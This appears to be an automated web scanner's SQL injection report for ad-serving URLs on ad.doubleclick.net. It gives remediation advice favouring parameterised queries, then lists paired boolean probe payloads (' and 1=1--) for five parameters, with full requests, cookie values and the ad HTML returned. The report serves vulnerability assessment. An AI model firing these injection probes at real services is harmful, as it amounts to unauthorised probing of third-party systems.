SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The b parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the b parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf"; var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
Request 2
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11e/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>
The count parameter appears to be vulnerable to SQL injection attacks. The payloads 14607837'%20or%201%3d1--%20 and 14607837'%20or%201%3d2--%20 were each submitted in the count parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>
Request 2
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.swf"; var gif = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0417-_-0430"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=124 ...[SNIP]...
The h parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf"; var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D% ...[SNIP]...
Request 2
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>
The orh parameter appears to be vulnerable to SQL injection attacks. The payloads 22418465'%20or%201%3d1--%20 and 22418465'%20or%201%3d2--%20 were each submitted in the orh parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf"; var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Es ...[SNIP]...
Request 2
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/k;239957923;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>
The pg parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pg parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf"; var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
